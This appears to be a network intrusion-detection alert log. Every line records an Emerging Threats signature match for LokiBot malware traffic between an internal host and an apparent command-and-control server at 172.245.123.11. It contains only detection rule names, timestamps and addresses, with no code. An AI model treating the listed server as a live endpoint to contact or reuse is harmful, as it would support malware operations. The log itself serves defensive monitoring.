2025-01-07T11:03:15.287870+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50090	TCP
2025-01-07T11:03:15.503726+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50091	172.245.123.11	80	TCP
2025-01-07T11:03:15.503726+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50091	172.245.123.11	80	TCP
2025-01-07T11:03:15.503726+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50091	172.245.123.11	80	TCP
2025-01-07T11:03:16.006105+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50091	172.245.123.11	80	TCP
2025-01-07T11:03:16.006105+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50091	172.245.123.11	80	TCP
2025-01-07T11:03:16.010889+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50091	TCP
2025-01-07T11:03:16.146706+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50092	172.245.123.11	80	TCP
2025-01-07T11:03:16.146706+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50092	172.245.123.11	80	TCP
2025-01-07T11:03:16.146706+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50092	172.245.123.11	80	TCP
2025-01-07T11:03:16.665049+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50092	172.245.123.11	80	TCP
2025-01-07T11:03:16.665049+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50092	172.245.123.11	80	TCP
2025-01-07T11:03:16.665102+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50092	TCP
2025-01-07T11:03:16.829444+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50093	172.245.123.11	80	TCP
2025-01-07T11:03:16.829444+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50093	172.245.123.11	80	TCP
2025-01-07T11:03:16.829444+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50093	172.245.123.11	80	TCP
2025-01-07T11:03:17.417958+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50093	172.245.123.11	80	TCP
2025-01-07T11:03:17.417958+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50093	172.245.123.11	80	TCP
2025-01-07T11:03:17.422734+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50093	TCP
2025-01-07T11:03:17.571531+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50094	172.245.123.11	80	TCP
2025-01-07T11:03:17.571531+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50094	172.245.123.11	80	TCP
2025-01-07T11:03:17.571531+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50094	172.245.123.11	80	TCP
2025-01-07T11:03:18.071243+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50094	172.245.123.11	80	TCP
2025-01-07T11:03:18.071243+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50094	172.245.123.11	80	TCP
2025-01-07T11:03:18.076057+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50094	TCP
2025-01-07T11:03:18.224687+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50095	172.245.123.11	80	TCP
2025-01-07T11:03:18.224687+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50095	172.245.123.11	80	TCP
2025-01-07T11:03:18.224687+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50095	172.245.123.11	80	TCP
2025-01-07T11:03:18.730694+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50095	172.245.123.11	80	TCP
2025-01-07T11:03:18.730694+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50095	172.245.123.11	80	TCP
2025-01-07T11:03:18.735502+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50095	TCP
2025-01-07T11:03:18.881699+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50096	172.245.123.11	80	TCP
2025-01-07T11:03:18.881699+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50096	172.245.123.11	80	TCP
2025-01-07T11:03:18.881699+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50096	172.245.123.11	80	TCP
2025-01-07T11:03:19.380183+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50096	172.245.123.11	80	TCP
2025-01-07T11:03:19.380183+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50096	172.245.123.11	80	TCP
2025-01-07T11:03:19.380219+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50096	TCP
2025-01-07T11:03:19.523285+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50097	172.245.123.11	80	TCP
2025-01-07T11:03:19.523285+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50097	172.245.123.11	80	TCP
2025-01-07T11:03:19.523285+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50097	172.245.123.11	80	TCP
2025-01-07T11:03:20.048570+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50097	172.245.123.11	80	TCP
2025-01-07T11:03:20.048570+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50097	172.245.123.11	80	TCP
2025-01-07T11:03:20.048644+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50097	TCP
2025-01-07T11:03:20.196458+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50098	172.245.123.11	80	TCP
2025-01-07T11:03:20.196458+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50098	172.245.123.11	80	TCP
2025-01-07T11:03:20.196458+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50098	172.245.123.11	80	TCP
2025-01-07T11:03:20.702835+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50098	172.245.123.11	80	TCP
2025-01-07T11:03:20.702835+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50098	172.245.123.11	80	TCP
2025-01-07T11:03:20.707633+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50098	TCP
2025-01-07T11:03:20.851457+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50099	172.245.123.11	80	TCP
2025-01-07T11:03:20.851457+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50099	172.245.123.11	80	TCP
2025-01-07T11:03:20.851457+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50099	172.245.123.11	80	TCP
2025-01-07T11:03:21.357331+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50099	172.245.123.11	80	TCP
2025-01-07T11:03:21.357331+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50099	172.245.123.11	80	TCP
2025-01-07T11:03:21.363986+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50099	TCP
2025-01-07T11:03:21.507813+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50100	172.245.123.11	80	TCP
2025-01-07T11:03:21.507813+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50100	172.245.123.11	80	TCP
2025-01-07T11:03:21.507813+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50100	172.245.123.11	80	TCP
2025-01-07T11:03:21.997605+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50100	172.245.123.11	80	TCP
2025-01-07T11:03:21.997605+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50100	172.245.123.11	80	TCP
2025-01-07T11:03:22.002829+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50100	TCP
2025-01-07T11:03:22.176021+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50101	172.245.123.11	80	TCP
2025-01-07T11:03:22.176021+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50101	172.245.123.11	80	TCP
2025-01-07T11:03:22.176021+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50101	172.245.123.11	80	TCP
2025-01-07T11:03:23.056888+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50101	172.245.123.11	80	TCP
2025-01-07T11:03:23.056888+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50101	172.245.123.11	80	TCP
2025-01-07T11:03:23.056926+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50101	TCP
2025-01-07T11:03:23.213434+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50102	172.245.123.11	80	TCP
2025-01-07T11:03:23.213434+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50102	172.245.123.11	80	TCP
2025-01-07T11:03:23.213434+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50102	172.245.123.11	80	TCP
2025-01-07T11:03:24.002235+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50102	172.245.123.11	80	TCP
2025-01-07T11:03:24.002235+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50102	172.245.123.11	80	TCP
2025-01-07T11:03:24.002501+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50102	TCP
2025-01-07T11:03:24.151005+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50103	172.245.123.11	80	TCP
2025-01-07T11:03:24.151005+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50103	172.245.123.11	80	TCP
2025-01-07T11:03:24.151005+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50103	172.245.123.11	80	TCP
2025-01-07T11:03:24.672832+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50103	172.245.123.11	80	TCP
2025-01-07T11:03:24.672832+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50103	172.245.123.11	80	TCP
2025-01-07T11:03:24.677650+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50103	TCP
2025-01-07T11:03:24.824519+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50104	172.245.123.11	80	TCP
2025-01-07T11:03:24.824519+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50104	172.245.123.11	80	TCP
2025-01-07T11:03:24.824519+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50104	172.245.123.11	80	TCP
2025-01-07T11:03:26.568049+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50104	172.245.123.11	80	TCP
2025-01-07T11:03:26.568049+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50104	172.245.123.11	80	TCP
2025-01-07T11:03:26.572830+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50104	TCP
2025-01-07T11:03:26.710640+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50105	172.245.123.11	80	TCP
2025-01-07T11:03:26.710640+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50105	172.245.123.11	80	TCP
2025-01-07T11:03:26.710640+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50105	172.245.123.11	80	TCP
2025-01-07T11:03:27.233167+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50105	172.245.123.11	80	TCP
2025-01-07T11:03:27.233167+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50105	172.245.123.11	80	TCP
2025-01-07T11:03:27.233439+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50105	TCP
2025-01-07T11:03:27.380300+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50106	172.245.123.11	80	TCP
2025-01-07T11:03:27.380300+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50106	172.245.123.11	80	TCP
2025-01-07T11:03:27.380300+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50106	172.245.123.11	80	TCP
2025-01-07T11:03:27.880660+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50106	172.245.123.11	80	TCP
2025-01-07T11:03:27.880660+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50106	172.245.123.11	80	TCP
2025-01-07T11:03:27.885439+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50106	TCP
2025-01-07T11:03:28.015736+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50107	172.245.123.11	80	TCP
2025-01-07T11:03:28.015736+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50107	172.245.123.11	80	TCP
2025-01-07T11:03:28.015736+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50107	172.245.123.11	80	TCP
2025-01-07T11:03:28.538323+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50107	172.245.123.11	80	TCP
2025-01-07T11:03:28.538323+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50107	172.245.123.11	80	TCP
2025-01-07T11:03:28.538369+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50107	TCP
2025-01-07T11:03:28.703037+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50108	172.245.123.11	80	TCP
2025-01-07T11:03:28.703037+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50108	172.245.123.11	80	TCP
2025-01-07T11:03:28.703037+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50108	172.245.123.11	80	TCP
2025-01-07T11:03:29.206821+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50108	172.245.123.11	80	TCP
2025-01-07T11:03:29.206821+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50108	172.245.123.11	80	TCP
2025-01-07T11:03:29.211601+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50108	TCP
2025-01-07T11:03:29.349451+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50109	172.245.123.11	80	TCP
2025-01-07T11:03:29.349451+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50109	172.245.123.11	80	TCP
2025-01-07T11:03:29.349451+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50109	172.245.123.11	80	TCP
2025-01-07T11:03:29.874483+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50109	172.245.123.11	80	TCP
2025-01-07T11:03:29.874483+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50109	172.245.123.11	80	TCP
2025-01-07T11:03:29.879303+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50109	TCP
2025-01-07T11:03:30.026092+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50110	172.245.123.11	80	TCP
2025-01-07T11:03:30.026092+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50110	172.245.123.11	80	TCP
2025-01-07T11:03:30.026092+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50110	172.245.123.11	80	TCP
2025-01-07T11:03:30.549629+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50110	172.245.123.11	80	TCP
2025-01-07T11:03:30.549629+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50110	172.245.123.11	80	TCP
2025-01-07T11:03:30.549655+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50110	TCP
2025-01-07T11:03:30.701445+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50111	172.245.123.11	80	TCP
2025-01-07T11:03:30.701445+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50111	172.245.123.11	80	TCP
2025-01-07T11:03:30.701445+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50111	172.245.123.11	80	TCP
2025-01-07T11:03:31.244877+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50111	172.245.123.11	80	TCP
2025-01-07T11:03:31.244877+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50111	172.245.123.11	80	TCP
2025-01-07T11:03:31.244883+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50111	TCP
2025-01-07T11:03:31.406580+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50112	172.245.123.11	80	TCP
2025-01-07T11:03:31.406580+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50112	172.245.123.11	80	TCP
2025-01-07T11:03:31.406580+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50112	172.245.123.11	80	TCP
2025-01-07T11:03:31.926789+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50112	172.245.123.11	80	TCP
2025-01-07T11:03:31.926789+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50112	172.245.123.11	80	TCP
2025-01-07T11:03:31.931632+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50112	TCP
2025-01-07T11:03:32.067627+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50113	172.245.123.11	80	TCP
2025-01-07T11:03:32.067627+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50113	172.245.123.11	80	TCP
2025-01-07T11:03:32.067627+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50113	172.245.123.11	80	TCP
2025-01-07T11:03:32.585891+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50113	172.245.123.11	80	TCP
2025-01-07T11:03:32.585891+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50113	172.245.123.11	80	TCP
2025-01-07T11:03:32.590737+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50113	TCP
2025-01-07T11:03:32.733953+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50114	172.245.123.11	80	TCP
2025-01-07T11:03:32.733953+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50114	172.245.123.11	80	TCP
2025-01-07T11:03:32.733953+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50114	172.245.123.11	80	TCP
2025-01-07T11:03:33.260609+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50114	172.245.123.11	80	TCP
2025-01-07T11:03:33.260609+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50114	172.245.123.11	80	TCP
2025-01-07T11:03:33.260811+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50114	TCP
2025-01-07T11:03:33.433270+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50115	172.245.123.11	80	TCP
2025-01-07T11:03:33.433270+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50115	172.245.123.11	80	TCP
2025-01-07T11:03:33.433270+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50115	172.245.123.11	80	TCP
2025-01-07T11:03:34.641167+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50115	172.245.123.11	80	TCP
2025-01-07T11:03:34.641167+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50115	172.245.123.11	80	TCP
2025-01-07T11:03:34.641210+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50115	TCP
2025-01-07T11:03:34.782674+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50116	172.245.123.11	80	TCP
2025-01-07T11:03:34.782674+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50116	172.245.123.11	80	TCP
2025-01-07T11:03:34.782674+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50116	172.245.123.11	80	TCP
2025-01-07T11:03:35.284896+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50116	172.245.123.11	80	TCP
2025-01-07T11:03:35.284896+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50116	172.245.123.11	80	TCP
2025-01-07T11:03:35.289758+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50116	TCP
2025-01-07T11:03:35.422766+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50117	172.245.123.11	80	TCP
2025-01-07T11:03:35.422766+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50117	172.245.123.11	80	TCP
2025-01-07T11:03:35.422766+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50117	172.245.123.11	80	TCP
2025-01-07T11:03:35.968310+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50117	172.245.123.11	80	TCP
2025-01-07T11:03:35.968310+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50117	172.245.123.11	80	TCP
2025-01-07T11:03:35.973094+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50117	TCP
2025-01-07T11:03:36.111250+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50118	172.245.123.11	80	TCP
2025-01-07T11:03:36.111250+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50118	172.245.123.11	80	TCP
2025-01-07T11:03:36.111250+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50118	172.245.123.11	80	TCP
2025-01-07T11:03:36.632563+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50118	172.245.123.11	80	TCP
2025-01-07T11:03:36.632563+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50118	172.245.123.11	80	TCP
2025-01-07T11:03:36.637436+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50118	TCP
2025-01-07T11:03:36.787347+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50119	172.245.123.11	80	TCP
2025-01-07T11:03:36.787347+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50119	172.245.123.11	80	TCP
2025-01-07T11:03:36.787347+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50119	172.245.123.11	80	TCP
2025-01-07T11:03:37.297198+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50119	172.245.123.11	80	TCP
2025-01-07T11:03:37.297198+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50119	172.245.123.11	80	TCP
2025-01-07T11:03:37.301961+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50119	TCP
2025-01-07T11:03:37.443278+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50120	172.245.123.11	80	TCP
2025-01-07T11:03:37.443278+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50120	172.245.123.11	80	TCP
2025-01-07T11:03:37.443278+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50120	172.245.123.11	80	TCP
2025-01-07T11:03:37.932170+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50120	172.245.123.11	80	TCP
2025-01-07T11:03:37.932170+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50120	172.245.123.11	80	TCP
2025-01-07T11:03:37.940683+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50120	TCP
2025-01-07T11:03:38.078880+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50121	172.245.123.11	80	TCP
2025-01-07T11:03:38.078880+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50121	172.245.123.11	80	TCP
2025-01-07T11:03:38.078880+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50121	172.245.123.11	80	TCP
2025-01-07T11:03:38.582549+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50121	172.245.123.11	80	TCP
2025-01-07T11:03:38.582549+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50121	172.245.123.11	80	TCP
2025-01-07T11:03:38.582642+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50121	TCP
2025-01-07T11:03:38.720674+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50122	172.245.123.11	80	TCP
2025-01-07T11:03:38.720674+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50122	172.245.123.11	80	TCP
2025-01-07T11:03:38.720674+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50122	172.245.123.11	80	TCP
2025-01-07T11:03:39.249186+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50122	172.245.123.11	80	TCP
2025-01-07T11:03:39.249186+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50122	172.245.123.11	80	TCP
2025-01-07T11:03:39.253953+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50122	TCP
2025-01-07T11:03:39.392736+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50123	172.245.123.11	80	TCP
2025-01-07T11:03:39.392736+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50123	172.245.123.11	80	TCP
2025-01-07T11:03:39.392736+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50123	172.245.123.11	80	TCP
2025-01-07T11:03:39.917989+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50123	172.245.123.11	80	TCP
2025-01-07T11:03:39.917989+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50123	172.245.123.11	80	TCP
2025-01-07T11:03:39.918492+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50123	TCP
2025-01-07T11:03:40.062714+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50124	172.245.123.11	80	TCP
2025-01-07T11:03:40.062714+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50124	172.245.123.11	80	TCP
2025-01-07T11:03:40.062714+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50124	172.245.123.11	80	TCP
2025-01-07T11:03:40.576758+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50124	172.245.123.11	80	TCP
